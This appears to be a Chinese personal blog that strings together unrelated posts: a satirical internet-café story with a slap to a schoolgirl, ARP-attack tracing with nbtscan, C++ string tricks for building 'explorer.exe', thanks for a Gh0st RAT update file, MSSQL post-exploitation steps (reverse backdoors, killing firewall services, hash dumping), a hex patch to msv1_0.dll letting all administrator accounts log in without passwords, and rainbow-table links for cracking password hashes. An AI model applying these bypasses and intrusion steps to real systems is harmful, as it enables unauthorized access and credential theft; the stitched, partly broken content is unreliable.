Chinadu's Blog

PS:经典之语在于最后一句
很显然，身为一名在高档办公楼出入的公务员，我的业余生活比低贱的农民工要高贵很多。今天周末，我特地穿了一身光亮的红豆西服，来到杭州最好的网吧上网。

进了网吧，老板一看到我来了，连忙恭敬地把我脱下的西服放好，同时周围的少女们也投来了爱慕的目光。

我微笑，向她们点头示意。这时，我发现有一个女生对我的到来不理不睬，竟然目不转睛地盯着屏幕。我于是不顾少女们的阵阵惋惜走到了她的身边，细细打量，发现她面容姣好，眼睛很大，大概才上初中的年纪，非常适合非主流。这时我又发现原来她正在玩魔兽世界。我很气愤，怎么这种粗俗的游戏还没有被删掉呢？我走回柜台质问老板，老板战战兢兢地说是那个女生临时安装的。我明白了，原来这位女生是一名不幸的被魔兽世界毒害了的少女。

身为公务员，我不能眼睁睁地看着祖国的花朵就这么被糟蹋。我决定用我的高贵挽救她堕落的灵魂。我快步上前，把她电脑的插头猛地拔了，她一懵，随即骂道：“你神经啊？！”

周围的女生见我被骂了，个个愤愤不平。我抬了抬手，示意大家冷静。我温和地对这个初中生说：“你知道你在玩什么吗？”
“你脑子进水啦？老板，这里有个神经病！”她叫到。
我回头瞪了老板一眼，他马上躲到了柜台后面，很显然，他正在为没有及时制止顾客玩魔兽世界而做着深刻的忏悔。

“那是最血腥、最暴力、最无耻、最X L的魔兽世界！你怎么可以玩这种下贱的游戏呢？！”我喝道。

“我玩游戏怎么了？关你P事啊？！”

见她张嘴就是脏话，我就知道她幼小的心灵已经被魔兽世界深深污染了，为了挽救她，我狠下心来，伸手就是一巴掌。

“啪”的一声，她粉嫩的脸颊立马红肿了一片。“哇哇哇…你为什么打我…”她大哭起来。

“你知道你玩的魔兽世界是个什么样的游戏吗？它是电子毒.品，是精神鸦片！它在毒害你意识的同时还在麻醉你的思想，腐蚀你的灵魂！你知道有多少人因为玩魔兽世界妻搞得妻离子散家破人亡吗？”

“你……你骗人……”她捂着脸，泪汪汪地说。

“电视里都播了，真是白骨累累、血泪如山啊！”想着CCAV里播放的那些被毒害了的青年，我的眼眶湿润了，“你还小，还年轻，未来的路还很长，你不应该被这种恶心的游戏毁掉前程！”

在我的谆谆教诲下，她终于红着脸低下了头，做着深刻的忏悔。这时网吧里冲进来一个中年妇女，猛地抱住这个女生就哭：“孩子啊！听妈妈的话，别玩了！”

原来她们是母女。魔兽世界害得母女分离，真是罪大恶极！女生痛哭流涕，抽泣道：“妈妈……我明白了……我……我再也不玩魔兽世界了！……是这位叔叔教育了我！”

中年妇女感激地望着我，我朝她们微笑地点了点头。这时网吧里爆发出一阵雷鸣般的掌声。

我在掌声中坐了下来，神情自若，打开电脑，开始玩我最爱的劲舞团。

“叔叔，这是什么游戏呀？”刚刚得到心灵救赎的女生站在我旁边，好奇地问。

“这是一款很高贵的游戏，而且还能开发智力，有益身心。你想学么？”

“想的！”

“好，那就让我来教你吧！”

一时间,掌声,草泥马,马勒戈壁等声音再次萦绕在耳边,久久不能散去...

扫描网内有哪台机器的网卡是处于混杂模式的，从而判断这台机器有可能就是“元凶”。定位好机器后，再做病毒信息收集，提交给趋势科技做分析处理。
标注：网卡可以置于一种模式叫混杂模式（promiscuous），在这种模式下工作的网卡能够收到一切通过它的数据，而不管实际上数据的目的地址是不是它。这实际就是Sniffer工作的基本原理：让网卡接收一切它所能接收的数据。
被动定位方式：在局域网发生ARP攻击时，查看交换机的动态ARP表中的内容，确定攻击源的MAC地址；也可以在局域居于网中部署Sniffer工具，定位ARP攻击源的MAC。
也可以直接Ping网关IP，完成Ping后，用ARP –a查看网关IP对应的MAC地址，此MAC地址应该为欺骗的,使用NBTSCAN可以取到PC的真实IP地址、机器名和MAC地址，如果有”ARP攻 击”在做怪，可以找到装有ARP攻击的PC的IP、机器名和MAC地址。
命令：“nbtscan -r 192.168.16.0/24”（搜索整个192.168.16.0/24网段, 即192.168.16.1-192.168.16.254）；或“nbtscan 192.168.16.25-137”搜索192.168.16.25-137 网段，即192.168.16.25-192.168.16.137。输出结果第一列是IP地址，最后一列是MAC地址。　NBTSCAN的使用范例：
假设查找一台MAC地址为“000d870d585f”的病毒主机。
1）将压缩包中的nbtscan.exe 和cygwin1.dll解压缩放到c:下。
2）在Windows开始—运行—打开，输入cmd（windows98输入“command”），在出现的DOS窗口中输入：C: btscan -r 192.168.16.1/24（这里需要根据用户实际网段输入），回车。
3）通过查询IP–MAC对应表，查出“000d870d585f”的病毒主机的IP地址为“192.168.16.223”。
通过上述方法，我们就能够快速的找到病毒源，确认其MAC——〉机器名和IP地址。
2．防御方法
a.使用可防御ARP攻击的三层交换机，绑定端口-MAC-IP，限制ARP流量，及时发现并自动阻断ARP攻击端口，合理划分VLAN，彻底阻止盗用IP、MAC地址，杜绝ARP的攻击。
b.对于经常爆发病毒的网络，进行Internet访问控制，限制用户对网络的访问。此类ARP攻击程序一般都是从Internet下载到用户终端，如果能够加强用户上网的访问控制，就能极大的减少该问题的发生。
c.在发生ARP攻击时，及时找到病毒攻击源头，并收集病毒信息，可以使用趋势科技的SIC2.0，同时收集可疑的病毒样本文件，一起提交到趋势科技的TrendLabs进行分析，TrendLabs将以最快的速度提供病毒码文件，从而可以进行ARP病毒的防御。

下面是修改的详细方法(我用"explorer.exe"作为例子修改）

1、
#include //加一个头文件
/*......*/
char *str1,*str2,*str3,*str4;
strcpy (str1,"exp"); //复制"exp"到str1
strcpy (str2,"plorer");
strcpy (str3,"exe");
strcat (str1,str2); //将str2连接到str1后
strcat (str2,str3);
strcpy (str4,str3); //str4值为"explorer.exe"

2、
#include //加一个头文件
using namespace std; //声明名空间
/*......*/
string *str1,*str2,*str3;
str1.assign ("explo"); //复制"explo"到str1
str2.assign ("rer.exe");
str1.append (str2); //将str2连接到str1后
str3.assign (str1); //str3值为"explorer.exe"

3、
#include //加一个头文件
using namespace std; //声明名空间
/*......*/
string *s1="abcexplorer.exekgh";
s1.substr(3,12); //3为从第三个字节开始读取，12为读取12个字符

4、
#include //加一个头文件
using namespace std; //声明名空间
/*......*/
string *s1="ex.exe";
string *s2="plorer";
s1.insert(2,s2); //在第2个字节后插入s2的值

5、
#include //加一个头文件
using namespace std; //声明名空间
/*......*/
string *s1="explorer.exe";
string *s2="ip.tet"
s1.swap (s2); //交换s1与s2的值，s2值为"explorer.exe"

感谢冯大牛写了这个Gh0st上线更新PHP文件

先说一下　cain安装成功，但是无法启动的情况　提示　应用程序初始化(0xc00000222)失败，请单击确定，终止此应用程序，如图

这并不是因为中毒了，或者杀软什么的，而是因为系统的c:\windows\system32\npstools.dll文件被替换了(可能有的系统为了安全故意替换的，包括netfuke没有这文件也是没法启动的)，只要用正确的npstools.dll替换到c:\windows\system32目录就可以了(如果c:\windows\system32\dllcache也有此文件，要先替换这个目录的)．如果有ntfs权限问题，要做出相应的设置 (具体的可以参考视频教程).

还有些情况，是winpcap安装不成功的，也是因为系统文件被替换了，或者做了相应的权限设置，主要有
Packet.dll，WanPacket.dll，wpcap.dll,pthreadVC.dll,npf.sys

这个用起来很爽，扩展功能不是一般的强大

1.web,sql分离(sql上网),sa. 读系统用户密码或加用户反弹,种反弹型后门.

2.web,sql分离(sql不上网),sa. 把和防火墙和策略有关的服务或进程kill掉再测试是否上网 收集尽量多的密码表.sqlsniffer findpass gethashs ipc$猜web密码 vbs读系统日志查看管理员登陆IP 有可能的话导出注册表的secpol查看策略规则.


3.web,sql分离(sql上网),dbo_owner. 猜密码进web后台. 备份hta到启动项

4.web,sql分离(sql不上网),dbo_owner.猜密码进web后台.

(重点在4,在opendatasource的时候不要以为弹不到外面的1433就不上网了,可以尝试其他的端口 比如20 21 25 443 445 80等防火墙经常开放的端口)

来源：7jdg's blog

这东西再放都长毛了,放出来....精灵还写了个利用工具,找不到了.回头补上..

ystem32下 有个msv1_0.dll

xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D

2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF

2k sp4
F8 10 75 11 b0 01 8b 4D
修改为
E0 00 75 11 b0 01 8b 4D

2003 sp1
F8 10 0F 84 D0 B8 FF FF
修改为
E0 00 0F 84 D0 B8 FF FF

vista rtm
F8 10 75 13 B0 01 8B 4D
修改为
E0 00 75 13 B0 01 8B 4D

都是前两个字节改为
E0 00

全部管理员帐号无须密码登陆
包括远程登陆的

改两个目录的 msv1_0.dll 用16进制
dir /s c:\windows\msv1_0.dll

PS:最近在搞彩虹表

上次那个只能到92%，现在修复了可以下载100%

彩虹表 详细介绍（来源赛迪网）：
http://tech.ccidnet.com/art/237/20070913/1211093_1.html

彩虹表的使用教程：
http://www.3800hk.com/donghua/f/25542.html

彩虹表 官方下载地址：
http://ophcrack.sourceforge.net/

大家需要做的就是下载下面两个东西
1、ophcrack All platforms
2、ophcrack LiveCDNo installation
第一个是XP平台上运行的软件 ophcrack-win32-installer-3.0.1.exe
第二个是LiveCD，你可以用这张CD引导系统，在Linux环境下自动识别windows系统并且破解登陆密码 ophcrack-xp-livecd-2.0.1.iso


>> 关于彩虹表的使用
[RainbowCrack + LM Tables 破解SAM密码]
http://www.t00ls.net/viewthread.php?tid=505

[SAMInside + LM Tables 破解SAM密码完美组合]
http://www.t00ls.net/viewthread.php?tid=503


最小彩虹表是最基本的字母数字表，就这样它的大小就有388MB。这是Ophcrack启动盘默认的表，很多人的收集便有了传说中的120G的彩虹表。

120G彩虹表HTTP下载
http://www.t00ls.net/viewthread.php?tid=474

下载地址1 Http://hash.0x54.com 铁通
下载地址2 Http://hash2.0x54.com 电信
备用地址1 Http://hash.t00ls.net 铁通
备用地址2 Http://hash2.t00ls.net 电信


点击下载此文件

原文网址：http://www.upx8.com/article.asp?id=271

http://www.upx8.com/article.asp?id=271

地址是国外的，很好很强大，需要的硬盘也很大， ~！
md5,sha1,lm-hash,nt-hash都在里面。

ciscopix_mixalpha-numeric-all-space_1-6
halflmchall_alpha-numeric_1-7
lm_all_1-7
lm_alpha-numeric_1-7
lm_alpha_1-7
lm_alpha_numeric_1-7


md5_loweralpha-numeric_1-8
md5_loweralpha-space_1-9
md5_mixalpha-numeric-all-space_1-6
md5_mixalpha-numeric-space_1-7
md5_numeric_1-12
mscache_mixalpha-numeric-all-space_1-6
ntlm_loweralpha-numeric-space_1-8
ntlm_loweralpha-space_1-9
ntlm_loweralpha_1-9
ntlm_mixalpha-numeric-all-space_1-6_perfect

下载地址：http://rainbowtables.ddl.cx/

lm_all-space#1-7
lm_alpha-numeric#1-7
md5_alpha-numeric-space#1-8
md5_alpha-space#1-9
md5_hybrid(loweralpha#6-6,numeric#1-3)
md5_hybrid(loweralpha#7-7,numeric#1-3)
md5_loweralpha-numeric-space#1-8
md5_loweralpha-numeric-symbol32-space#1-7
md5_loweralpha-space#1-9
md5_mixalpha-numeric-all-space#1-6
md5_mixalpha-numeric-space#1-7
md5_numeric#1-12
ntlm_alpha-numeric-space#1-8
ntlm_alpha-space#1-9
ntlm_hybrid(loweralpha#6-6,numeric#1-3)
ntlm_loweralpha-numeric-space#1-8
ntlm_loweralpha-numeric-symbol32-space#1-7
ntlm_loweralpha-space#1-9
ntlm_mixalpha-numeric-all-space#1-6
ntlm_mixalpha-numeric-space#1-7
ntlm_numeric#1-12
fastlm_alpha-numeric#1-7
halflmchall_alpha-numeric#1-7
sha1_loweralpha-numeric-space#1-8
sha1_loweralpha-space#1-9
sha1_mixalpha-numeric#1-7
sha1_numeric#1-12

下载地址：http://tbhost.eu/rt.php

新华网6月26日报道 美国著名流行歌星迈克尔·杰克逊２５日因心脏病发作在洛杉矶的一家医院去世。

美国《洛杉矶时报》网站援引当地警方的消息称，杰克逊当天下午因心脏病发作深度昏迷被送入洛杉矶加州大学医疗中心，不久该中心的医生正式宣布这位５０岁的前流行乐坛巨星不治身亡。

另据中国网报道美联社、洛杉矶时报等多家外媒消息，北京时间26日5:26(洛杉矶当地时间25日14:26）左右，著名歌星迈克尔-杰克逊因心搏停止在送往医院后死亡。

据CNN信源称，现年50岁的杰克逊在送往医院后一直处于昏迷状态。当地验尸官随后宣布杰克逊在洛杉矶当地时间25日14:26（北京时间26日5:26）死亡。

杰克逊的家庭律师布赖恩-奥克斯曼称，迈克尔-杰克逊的兄弟兰迪-杰克逊告诉他杰克逊实在美国时间周四早晨在西洛杉矶病倒的。目前，杰克逊家人都已得到了该消息，他们或已在医院或赶往医院的路上。在医疗中心，所有通往急诊室的入口都被保安人员封住了。甚至不允许医院的工作人员进入。有几个人站在候诊区内，其中一些人在哭泣。

据急救人员史蒂夫-鲁达说,他们在洛杉矶当地时间25日12:21（北京时间26日3:21）接到西洛杉矶的紧急电话。他说杰克逊得到治疗并被转送到加利福尼亚大学洛杉矶分校医疗中心。当被问及病人的具体病情时，他称，根据联邦隐私法，他不能谈论此话题。

杰克逊--这位印地安纳加里的音乐偶像，被称为“流行音乐之王”。他有许多一流的经典曲目，“Thriller”是其中最畅销的专辑之一。据悉，他出生在一个有九个孩子的著名音乐家庭，排行第七。他有三个孩子，迈克尔王子一世、帕里斯和迈克尔王子二世。

个人资料

全 名：Michael Joseph Jackson

中译名：迈克尔·约瑟夫·杰克逊

其他译名：台湾译名：麦可·杰克森；香港译名：米高积逊 ；米高积臣

简称：MJ。

血型：A型

出生日期：1958年8月29日中午12:13

身高：179cm

星座：处女座

出生地点：美国 印第安纳州 加里市 Jackson街21号(Gary, Indiana, USA)

主要音乐风格：新杰克摇摆舞曲(New Jack Swing)，俱乐部舞曲(Club/Dance)，流行/摇滚(Pop/Rock)，摩顿黑人音乐(Motown)，都市流行(Urban)，放克(Funk)，节奏布鲁斯(R&B)

主要歌唱特色：假声，痉挛，活力，热情，伤感，警醒，快乐，自信，丰富，时髦，真诚，盛典，神秘，口技

主要舞蹈风格：机械舞、踢踏舞、霹雳舞、现代舞、太空步

个人简历

迈克尔·杰克逊（Michael Jackson）被誉为流行音乐之王（the King of Pop），是继猫王之后西方流行乐坛最具影响力的音乐家,其成就已超越猫王，是出色的音乐全才，在作词，作曲，场景制作，编曲，演唱，舞蹈，乐器演奏方面都有着卓越的成就。

迈克尔与猫王、披头士两组歌手并列为流行乐史上最伟大的不朽象征，他开创了现代MTV，他把流行音乐推向了巅峰，他融合了黑人节奏蓝调与白人摇滚的独特的MJ乐风，时而高亢愤疾、时而柔美灵动的声音，空前绝后的高水准音乐录影，规模宏大的演唱会无不在世界各地引起极大轰动. 他拥有世界销量第一的专辑《THRILLER》，销量达1.04亿（2006年吉尼斯世界纪录认证数据）。

据2006年底统计，其正版专辑全球销量已超过7.5亿，被载入“吉尼斯世界记录大全”。他是音乐史上第一位在美国以外卖出上亿张唱片的艺术家。他魔幻般的舞步更是让无数的明星效仿。2006年，吉尼斯世界纪录颁发了一个最新认证：世界历史上最成功的艺术家！ 他一个人支持了世界上39个慈善救助基金会，保持着2006年的吉尼斯世界个人慈善纪录，是全世界以个人名义捐助慈善事业最多的人。他患有白癜风皮肤病，皮肤呈白色.

刚才成功的把BT4(bt4-pre-final版基于ubuntu的linux)装入优盘并启动成功，现把一点体会与大家共享，不会装的可以参照，高手就请指教了。
本人也是在琢摸了好几天才搞清楚，之前的bt3都是采用syslinux引导的。在安装bt3时先用ultraiso软件把下载的bt3镜像文件（iso）装入优盘，然后dos下执行syslinux
X：完成的（X为优盘）安装。

这次去本站给的链接一天时间下载了巨大的bt4-pre-final.iso文件，有1.3G。照以前的办法引导失败了！！又按照bt4使用说明的提示下载unetbootin软件，图形化界面，执行镜像导入，但是进入屏幕后一片漆黑什么都没有，等了半个小时也是这样。
遂查询原因，发现里面boot\目录有个grub文件夹，猜想应该是用grub方式引导的。于是有了本文以下的办法：
一、 准备工作：

1、下载grub4dos软件最新版；

2、下载command、io.sys、msdos.sys三个dos引导文件；（网上到处都是）

3、用ultraiso把bt4-pre-final.iso中的boot、casper文件夹提取出来放在一边备用；（用winrar应该也行）
4、下载惠普的格式化工具HPUSBFW（小巧实用，网上很多）/不想下载的话直接用ultraiso也应该一样；
二、步骤：
一般来说实现grub4dos优盘引导有两种办法：dos方式（IO）进入grub和mbr方式进入grub。据说mbr方式速度快、兼容性好，但由于需要使用bootlace.com命令或grubinst有图形界面的程序完成，一来本人不熟悉，二来担心改了mbr以后麻烦。所以采用的是dos引导方式。
1、照着提示，用惠普格式化工具HPUSBFW把command、io.sys、msdos.sys三个dos系统文件格式化方式写入优盘；（或者ultraiso也行）
2、把grub4dos压缩包解压缩，里面的文件拷入优盘根目录（其实并不需要全部，但总共也不多，懒得挑拣，其实grldr、grub.exe、menu.lst就够了）；
3、把刚才提取的boot、casper两个文件夹拷贝进优盘根目录下；
4、用boot\grub目录下的文件menu.lst替换优盘根目录下的同名文件（即grub4dos中的menu.lst文件演示版）。
其实高手可以自行编写menu.lst文件，也不是很复杂，但既然下载的版本里面提供了，我就不多此一举了。
三、结果
（可能我下的三个dos系统文件缘故）开机之后首先一闪win98界面（我小时候熟悉的），然后有按空格键的提示，不管它。稍等片刻进入dos命令提示符（我的是c盘），输入grub，进入bt4选择界面，好几条，什么像素等等，我选1024*什么的。马上进入bt4的linux命令行界面，输入startx进入图形化界面，接下来就可以用鼠标操作了。

四、关于引导:
1、之前使用winpe的好几个版本镜像，都是直接用ultraiso写入优盘就可以了。但不知何故bt3就不行，winpe镜像好像也是用syslinux引导的，是不是把syslinux命令生成的ldlinux.sys（记得是这个）文件一起并入iso镜像就可以了呢？本人没试过，希望知道的朋友告诉一声。
2、用同样的办法制作dvdrw引导盘应该也可以的；
3、menu.lst命令，在下载的boot\grub文件夹中同名文件menu.lst参照这个就可以了，在此基础上改背景、增加功能什么的都比较方便；